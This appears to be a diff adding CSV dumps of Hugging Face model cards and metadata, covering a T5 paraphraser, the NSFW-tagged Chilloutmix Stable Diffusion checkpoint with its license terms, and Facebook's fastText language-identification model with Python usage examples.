""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- mteb/quora\nlanguage: en\nlibrary_name: transformers\nlicense: mit\nmetrics:\n- accuracy\ntags:\n- paraphrasing\n- T5\n- text generation\n- NLP\n- transformers\nthumbnail: https://example.com/thumbnail.png"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 222903552}, ""total"": 222903552}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-09-20 13:34:56+00:00"", ""cardData"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- mteb/quora\nlanguage: en\nlibrary_name: transformers\nlicense: mit\nmetrics:\n- accuracy\ntags:\n- paraphrasing\n- T5\n- text generation\n- NLP\n- transformers\nthumbnail: https://example.com/thumbnail.png"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""66ed75cf381b19003609784e"", ""modelId"": ""jaesani/chat_gpt_and_t5_base_paraphraser"", ""usedStorage"": 
892441544}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=jaesani/chat_gpt_and_t5_base_paraphraser&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bjaesani%2Fchat_gpt_and_t5_base_paraphraser%5D(%2Fjaesani%2Fchat_gpt_and_t5_base_paraphraser)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 318 |
+
TimeDom/Snake,"---
|
| 319 |
+
license: openrail
|
| 320 |
+
datasets:
|
| 321 |
+
- nvidia/HelpSteer2
|
| 322 |
+
language:
|
| 323 |
+
- ru
|
| 324 |
+
metrics:
|
| 325 |
+
- bleurt
|
| 326 |
+
base_model:
|
| 327 |
+
- humarin/chatgpt_paraphraser_on_T5_base
|
| 328 |
+
new_version: nvidia/Llama-3.1-Nemotron-70B-Instruct-HF
|
| 329 |
+
pipeline_tag: fill-mask
|
| 330 |
+
library_name: diffusers
|
| 331 |
+
tags:
|
| 332 |
+
- legal
|
| 333 |
+
---","{""id"": ""TimeDom/Snake"", ""author"": ""TimeDom"", ""sha"": ""73af8a6e4e6282a80df56685d231b1a40b7e493d"", ""last_modified"": ""2024-11-15 01:48:54+00:00"", ""created_at"": ""2024-11-15 01:45:32+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""legal"", ""fill-mask"", ""ru"", ""dataset:nvidia/HelpSteer2"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:openrail"", ""region:us""], ""pipeline_tag"": ""fill-mask"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- nvidia/HelpSteer2\nlanguage:\n- ru\nlibrary_name: diffusers\nlicense: openrail\nmetrics:\n- bleurt\npipeline_tag: fill-mask\ntags:\n- legal\nnew_version: nvidia/Llama-3.1-Nemotron-70B-Instruct-HF"", ""widget_data"": [{""text"": ""\u041c\u0435\u043d\u044f \u0437\u043e\u0432\u0443\u0442 <mask> \u0438 \u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440 \u0436\u0438\u0432\u0443\u0449\u0438\u0439 \u0432 \u041d\u044c\u044e-\u0419\u043e\u0440\u043a\u0435.""}], ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-15 01:48:54+00:00"", ""cardData"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- nvidia/HelpSteer2\nlanguage:\n- ru\nlibrary_name: diffusers\nlicense: openrail\nmetrics:\n- bleurt\npipeline_tag: fill-mask\ntags:\n- legal\nnew_version: nvidia/Llama-3.1-Nemotron-70B-Instruct-HF"", ""transformersInfo"": null, ""_id"": ""6736a7bc3890521c633dbef2"", ""modelId"": ""TimeDom/Snake"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=TimeDom/Snake&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTimeDom%2FSnake%5D(%2FTimeDom%2FSnake)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
chilloutmix_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
@@ -0,0 +1,63 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
swl-models/chilloutmix,"---
|
| 3 |
+
license: creativeml-openrail-m
|
| 4 |
+
duplicated_from: Chillout2023/Chilloutmix
|
| 5 |
+
tags:
|
| 6 |
+
- not-for-all-audiences
|
| 7 |
+
---
|
| 8 |
+
|
| 9 |
+
Civitai: https://civitai.com/models/6424/chilloutmix
|
| 10 |
+
|
| 11 |
+
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
Merged ""Basilmix""(nuigurumi/basil_mix · Hugging Face)
|
| 15 |
+
|
| 16 |
+
and
|
| 17 |
+
|
| 18 |
+
wonderful realistic models.
|
| 19 |
+
|
| 20 |
+
(PoV Skin Texture - r34 Lucid Black | Stable Diffusion Checkpoint | Civitai
|
| 21 |
+
|
| 22 |
+
PoV Skin Texture - Dreamlike r34 | Stable Diffusion Checkpoint | Civitai
|
| 23 |
+
|
| 24 |
+
by twilightBOO)
|
| 25 |
+
|
| 26 |
+
Use vae-ft-mse-840000
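|
A sketch of wiring that up with diffusers (assumptions: the fp16 single-file checkpoint name listed in this repo, and that vae-ft-mse-840000 is published as stabilityai/sd-vae-ft-mse):

```python
# Sketch: load the checkpoint with the ft-MSE VAE swapped in.
import torch
from diffusers import AutoencoderKL, StableDiffusionPipeline

vae = AutoencoderKL.from_pretrained(""stabilityai/sd-vae-ft-mse"", torch_dtype=torch.float16)
pipe = StableDiffusionPipeline.from_single_file(
    ""https://huggingface.co/swl-models/chilloutmix/blob/main/Chilloutmix-non-ema-fp16.safetensors"",
    vae=vae,
    torch_dtype=torch.float16,
).to(""cuda"")
```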
|
| 27 |
+
|
| 28 |
+
I think this model is good for realistic Asian girls' NSFW poses. (...now, you chill out.)
|
| 29 |
+
|
| 30 |
+
I prefer to use ""Ulzzang-6500"" embeddings (all samples)
|
| 31 |
+
|
| 32 |
+
↓
|
| 33 |
+
|
| 34 |
+
https://www.reddit.com/r/sdnsfw/comments/yv8d3l/embedding_i_trained_for_korean_ulzzang_face/
|
| 35 |
+
|
| 36 |
+
https://moritz.pm/files/ulzzang-6500.pt
|
| 37 |
+
|
| 38 |
+
https://oo.pe/https://moritz.pm/files/ulzzang-6500.pt
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
|
| 44 |
+
|
| 45 |
+
Because it incorporates Dreamlike Diffusion 1.0, this model carries the following license:
|
| 46 |
+
|
| 47 |
+
License
|
| 48 |
+
|
| 49 |
+
This model is licensed under a modified CreativeML OpenRAIL-M license.
|
| 50 |
+
|
| 51 |
+
- You can't host or use the model or its derivatives on websites/apps/etc., from which you earn, will earn, or plan to earn revenue or donations. If you want to, please email us at contact@dreamlike.art
|
| 52 |
+
|
| 53 |
+
- You are free to host the model card and files (Without any actual inference or finetuning) on both commercial and non-commercial websites/apps/etc. Please state the full model name (Dreamlike Diffusion 1.0) and include a link to the model card (https://huggingface.co/dreamlike-art/dreamlike-diffusion-1.0)
|
| 54 |
+
|
| 55 |
+
- You are free to host the model or its derivatives on completely non-commercial websites/apps/etc (Meaning you are not getting ANY revenue or donations). Please state the full model name (Dreamlike Diffusion 1.0) and include a link to the model card (https://huggingface.co/dreamlike-art/dreamlike-diffusion-1.0)
|
| 56 |
+
|
| 57 |
+
- You are free to use the outputs of the model or the outputs of the model's derivatives for commercial purposes in teams of 10 or less
|
| 58 |
+
|
| 59 |
+
- You can't use the model to deliberately produce or share illegal or harmful outputs or content
|
| 60 |
+
|
| 61 |
+
- The authors claim no rights over the outputs you generate; you are free to use them and are accountable for their use, which must not go against the provisions set in the license
|
| 62 |
+
|
| 63 |
+
- You may re-distribute the weights. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the modified CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully) Please read the full license here: https://huggingface.co/dreamlike-art/dreamlike-diffusion-1.0/blob/main/LICENSE.md","{""id"": ""swl-models/chilloutmix"", ""author"": ""swl-models"", ""sha"": ""f1a650ab7be1299b970d80e37540c2489e07fd78"", ""last_modified"": ""2023-03-30 00:43:49+00:00"", ""created_at"": ""2023-02-04 12:34:09+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 271, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""not-for-all-audiences"", ""license:creativeml-openrail-m"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: creativeml-openrail-m\ntags:\n- not-for-all-audiences\nduplicated_from: Chillout2023/Chilloutmix"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-ema-bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-ema-fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-ema-fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-non-ema-bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-non-ema-fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-non-ema-fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-03-30 00:43:49+00:00"", ""cardData"": ""license: creativeml-openrail-m\ntags:\n- not-for-all-audiences\nduplicated_from: Chillout2023/Chilloutmix"", ""transformersInfo"": null, ""_id"": ""63de50c1edf447149391c5d1"", ""modelId"": ""swl-models/chilloutmix"", ""usedStorage"": 26417688653}",0,,0,,0,,0,,0,,0
|
deberta-v3-large_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
fasttext-language-identification_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
@@ -0,0 +1,143 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
facebook/fasttext-language-identification,"---
|
| 3 |
+
license: cc-by-nc-4.0
|
| 4 |
+
library_name: fasttext
|
| 5 |
+
tags:
|
| 6 |
+
- text-classification
|
| 7 |
+
- language-identification
|
| 8 |
+
---
|
| 9 |
+
|
| 10 |
+
# fastText (Language Identification)
|
| 11 |
+
|
| 12 |
+
fastText is an open-source, free, lightweight library that allows users to learn text representations and text classifiers. It works on standard, generic hardware. Models can later be reduced in size to even fit on mobile devices. It was introduced in [this paper](https://arxiv.org/abs/1607.04606). The official website can be found [here](https://fasttext.cc/).
|
| 13 |
+
|
| 14 |
+
This LID (Language IDentification) model is used to predict the language of the input text, and the hosted version (`lid218e`) was [released as part of the NLLB project](https://github.com/facebookresearch/fairseq/blob/nllb/README.md#lid-model) and can detect 217 languages. You can find older versions (ones that can identify 157 languages) on the [official fastText website](https://fasttext.cc/docs/en/language-identification.html).
|
| 15 |
+
|
| 16 |
+
## Model description
|
| 17 |
+
|
| 18 |
+
fastText is a library for efficient learning of word representations and sentence classification. fastText is designed to be simple to use for developers, domain experts, and students. It's dedicated to text classification and learning word representations, and was designed to allow for quick model iteration and refinement without specialized hardware. fastText models can be trained on more than a billion words on any multicore CPU in less than a few minutes.
|
| 19 |
+
|
| 20 |
+
It includes pre-trained models learned on Wikipedia in over 157 different languages. fastText can be used as a command-line tool, linked from a C++ application, or used as a library for use cases from experimentation and prototyping to production.
|
| 21 |
+
|
| 22 |
+
## Intended uses & limitations
|
| 23 |
+
|
| 24 |
+
You can use pre-trained word vectors for text classification or language identification. See the [tutorials](https://fasttext.cc/docs/en/supervised-tutorial.html) and [resources](https://fasttext.cc/docs/en/english-vectors.html) on its official website to look for tasks that interest you.
|
| 25 |
+
|
| 26 |
+
### How to use
|
| 27 |
+
|
| 28 |
+
Here is how to use this model to detect the language of a given text:
|
| 29 |
+
|
| 30 |
+
```python
|
| 31 |
+
>>> import fasttext
|
| 32 |
+
>>> from huggingface_hub import hf_hub_download
|
| 33 |
+
|
| 34 |
+
>>> model_path = hf_hub_download(repo_id=""facebook/fasttext-language-identification"", filename=""model.bin"")
|
| 35 |
+
>>> model = fasttext.load_model(model_path)
|
| 36 |
+
>>> model.predict(""Hello, world!"")
|
| 37 |
+
|
| 38 |
+
(('__label__eng_Latn',), array([0.81148803]))
|
| 39 |
+
|
| 40 |
+
>>> model.predict(""Hello, world!"", k=5)
|
| 41 |
+
|
| 42 |
+
(('__label__eng_Latn', '__label__vie_Latn', '__label__nld_Latn', '__label__pol_Latn', '__label__deu_Latn'),
|
| 43 |
+
array([0.61224753, 0.21323682, 0.09696738, 0.01359863, 0.01319415]))
|
| 44 |
+
```
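|
The labels follow the NLLB `__label__<lang>_<script>` pattern; a small sketch for reducing the top prediction to a bare code (fastText expects single-line input, so strip newlines first):

```python
# Sketch: turn the top prediction into a plain language code.
labels, scores = model.predict(""Bonjour tout le monde"")
lang_code = labels[0].removeprefix(""__label__"")  # e.g. fra_Latn (Python 3.9+)
print(lang_code, float(scores[0]))
```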
|
| 45 |
+
|
| 46 |
+
### Limitations and bias
|
| 47 |
+
|
| 48 |
+
Even if the training data used for this model could be characterized as fairly neutral, this model can have biased predictions.
|
| 49 |
+
|
| 50 |
+
Cosine similarity can be used to measure the similarity between two different word vectors. If two vectors are identical, the cosine similarity will be 1. For two completely unrelated vectors, the value will be 0. If two vectors have an opposite relationship, the value will be -1.
|
| 51 |
+
|
| 52 |
+
```python
|
| 53 |
+
>>> import numpy as np
|
| 54 |
+
|
| 55 |
+
>>> def cosine_similarity(word1, word2):
|
| 56 |
+
...     return np.dot(model[word1], model[word2]) / (np.linalg.norm(model[word1]) * np.linalg.norm(model[word2]))
|
| 57 |
+
|
| 58 |
+
>>> cosine_similarity(""man"", ""boy"")
|
| 59 |
+
|
| 60 |
+
0.061653383
|
| 61 |
+
|
| 62 |
+
>>> cosine_similarity(""man"", ""ceo"")
|
| 63 |
+
|
| 64 |
+
0.11989131
|
| 65 |
+
|
| 66 |
+
>>> cosine_similarity(""woman"", ""ceo"")
|
| 67 |
+
|
| 68 |
+
-0.08834904
|
| 69 |
+
```
|
| 70 |
+
|
| 71 |
+
## Training data
|
| 72 |
+
|
| 73 |
+
Pre-trained word vectors for 157 languages were trained on [Common Crawl](http://commoncrawl.org/) and [Wikipedia](https://www.wikipedia.org/) using fastText. These models were trained using CBOW with position-weights, in dimension 300, with character n-grams of length 5, a window of size 5 and 10 negatives. We also distribute three new word analogy datasets, for French, Hindi and Polish.
|
| 74 |
+
|
| 75 |
+
## Training procedure
|
| 76 |
+
|
| 77 |
+
### Tokenization
|
| 78 |
+
|
| 79 |
+
We used the [Stanford word segmenter](https://nlp.stanford.edu/software/segmenter.html) for Chinese, [Mecab](http://taku910.github.io/mecab/) for Japanese and [UETsegmenter](https://github.com/phongnt570/UETsegmenter) for Vietnamese. For languages using the Latin, Cyrillic, Hebrew or Greek scripts, we used the tokenizer from the [Europarl](https://www.statmt.org/europarl/) preprocessing tools. For the remaining languages, we used the ICU tokenizer.
|
| 80 |
+
|
| 81 |
+
More information about the training of these models can be found in the article [Learning Word Vectors for 157 Languages](https://arxiv.org/abs/1802.06893).
|
| 82 |
+
|
| 83 |
+
### License
|
| 84 |
+
|
| 85 |
+
The language identification model is distributed under the [*Creative Commons Attribution-NonCommercial 4.0 International Public License*](https://creativecommons.org/licenses/by-nc/4.0/).
|
| 86 |
+
|
| 87 |
+
### Evaluation datasets
|
| 88 |
+
|
| 89 |
+
The analogy evaluation datasets described in the paper are available here: [French](https://dl.fbaipublicfiles.com/fasttext/word-analogies/questions-words-fr.txt), [Hindi](https://dl.fbaipublicfiles.com/fasttext/word-analogies/questions-words-hi.txt), [Polish](https://dl.fbaipublicfiles.com/fasttext/word-analogies/questions-words-pl.txt).
|
| 90 |
+
|
| 91 |
+
### BibTeX entry and citation info
|
| 92 |
+
|
| 93 |
+
Please cite [1] if using this code for learning word representations or [2] if using for text classification.
|
| 94 |
+
|
| 95 |
+
[1] P. Bojanowski\*, E. Grave\*, A. Joulin, T. Mikolov, [*Enriching Word Vectors with Subword Information*](https://arxiv.org/abs/1607.04606)
|
| 96 |
+
|
| 97 |
+
```markup
|
| 98 |
+
@article{bojanowski2016enriching,
|
| 99 |
+
title={Enriching Word Vectors with Subword Information},
|
| 100 |
+
author={Bojanowski, Piotr and Grave, Edouard and Joulin, Armand and Mikolov, Tomas},
|
| 101 |
+
journal={arXiv preprint arXiv:1607.04606},
|
| 102 |
+
year={2016}
|
| 103 |
+
}
|
| 104 |
+
```
|
| 105 |
+
|
| 106 |
+
[2] A. Joulin, E. Grave, P. Bojanowski, T. Mikolov, [*Bag of Tricks for Efficient Text Classification*](https://arxiv.org/abs/1607.01759)
|
| 107 |
+
|
| 108 |
+
```markup
|
| 109 |
+
@article{joulin2016bag,
|
| 110 |
+
title={Bag of Tricks for Efficient Text Classification},
|
| 111 |
+
author={Joulin, Armand and Grave, Edouard and Bojanowski, Piotr and Mikolov, Tomas},
|
| 112 |
+
journal={arXiv preprint arXiv:1607.01759},
|
| 113 |
+
year={2016}
|
| 114 |
+
}
|
| 115 |
+
```
|
| 116 |
+
|
| 117 |
+
[3] A. Joulin, E. Grave, P. Bojanowski, M. Douze, H. Jégou, T. Mikolov, [*FastText.zip: Compressing text classification models*](https://arxiv.org/abs/1612.03651)
|
| 118 |
+
|
| 119 |
+
```markup
|
| 120 |
+
@article{joulin2016fasttext,
|
| 121 |
+
title={FastText.zip: Compressing text classification models},
|
| 122 |
+
author={Joulin, Armand and Grave, Edouard and Bojanowski, Piotr and Douze, Matthijs and J{\'e}gou, H{\'e}rve and Mikolov, Tomas},
|
| 123 |
+
journal={arXiv preprint arXiv:1612.03651},
|
| 124 |
+
year={2016}
|
| 125 |
+
}
|
| 126 |
+
```
|
| 127 |
+
|
| 128 |
+
If you use these word vectors, please cite the following paper:
|
| 129 |
+
|
| 130 |
+
[4] E. Grave\*, P. Bojanowski\*, P. Gupta, A. Joulin, T. Mikolov, [*Learning Word Vectors for 157 Languages*](https://arxiv.org/abs/1802.06893)
|
| 131 |
+
|
| 132 |
+
```markup
|
| 133 |
+
@inproceedings{grave2018learning,
|
| 134 |
+
title={Learning Word Vectors for 157 Languages},
|
| 135 |
+
author={Grave, Edouard and Bojanowski, Piotr and Gupta, Prakhar and Joulin, Armand and Mikolov, Tomas},
|
| 136 |
+
booktitle={Proceedings of the International Conference on Language Resources and Evaluation (LREC 2018)},
|
| 137 |
+
year={2018}
|
| 138 |
+
}
|
| 139 |
+
```
|
| 140 |
+
|
| 141 |
+
(\* These authors contributed equally.)
|
| 142 |
+
|
| 143 |
+
","{""id"": ""facebook/fasttext-language-identification"", ""author"": ""facebook"", ""sha"": ""3af127d4124fc58b75666f3594bb5143b9757e78"", ""last_modified"": ""2023-06-09 12:39:43+00:00"", ""created_at"": ""2023-03-06 12:52:50+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 562430, ""downloads_all_time"": null, ""likes"": 227, ""library_name"": ""fasttext"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""fasttext"", ""text-classification"", ""language-identification"", ""arxiv:1607.04606"", ""arxiv:1802.06893"", ""arxiv:1607.01759"", ""arxiv:1612.03651"", ""license:cc-by-nc-4.0"", ""region:us""], ""pipeline_tag"": ""text-classification"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""library_name: fasttext\nlicense: cc-by-nc-4.0\ntags:\n- text-classification\n- language-identification"", ""widget_data"": [{""text"": ""I like you. I love you""}], ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""CohereLabs/aya_expanse"", ""kargaranamir/language-identification"", ""librarian-bots/dataset-language-detection-api"", ""kargaranamir/LangID-LIME"", ""YiyangLewisLu/facebook-fasttext-language-identification"", ""IllyrianSpace/aya_expanse"", ""dperales/ITACA_Insurance_Core_v4"", ""danielperales/ITACA_Insurace_NLP_v2"", ""Chuanming/facebook-fasttext-language-identification"", ""grabsky/facebook-fasttext-language-identification"", ""anzorq/lid"", ""SANCTVM/facebook-fasttext-language-identification"", ""davanstrien/dataset-language-prediction-api-literstar"", ""ZyrenthDev/language-identification"", ""futranbg/language_classiy"", ""haardik-20/language-identification"", ""NorHsangPha/fasttext-language-identification"", ""comqositi/facebook-fasttext-language-identification"", ""wzperson/facebook-fasttext-language-identification"", ""dsfsi/dsfsi-language-identification-spaces"", ""nishantb06/facebook-fasttext-language-identification"", ""jonathanjordan21/facebook-fasttext-language-identification"", ""dveneziani/facebook-fasttext-language-identification"", ""jeremierostan/Aya_For_Schools"", ""Anupam251272/AJ-Chat"", ""zulhijaya/facebook-fasttext-language-identification"", ""yukiakai/fasttext-language-identification"", ""samdo20/fasttext""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-06-09 12:39:43+00:00"", ""cardData"": ""library_name: fasttext\nlicense: cc-by-nc-4.0\ntags:\n- text-classification\n- language-identification"", ""transformersInfo"": null, ""_id"": ""6405e2229f5bb41f15e94b68"", ""modelId"": ""facebook/fasttext-language-identification"", ""usedStorage"": 1326211583}",0,,0,,0,,0,,0,"Chuanming/facebook-fasttext-language-identification, CohereLabs/aya_expanse, IllyrianSpace/aya_expanse, SANCTVM/facebook-fasttext-language-identification, YiyangLewisLu/facebook-fasttext-language-identification, anzorq/lid, danielperales/ITACA_Insurace_NLP_v2, dperales/ITACA_Insurance_Core_v4, grabsky/facebook-fasttext-language-identification, 
huggingface/InferenceSupport/discussions/new?title=facebook/fasttext-language-identification&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfacebook%2Ffasttext-language-identification%5D(%2Ffacebook%2Ffasttext-language-identification)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kargaranamir/LangID-LIME, kargaranamir/language-identification, librarian-bots/dataset-language-detection-api",13
|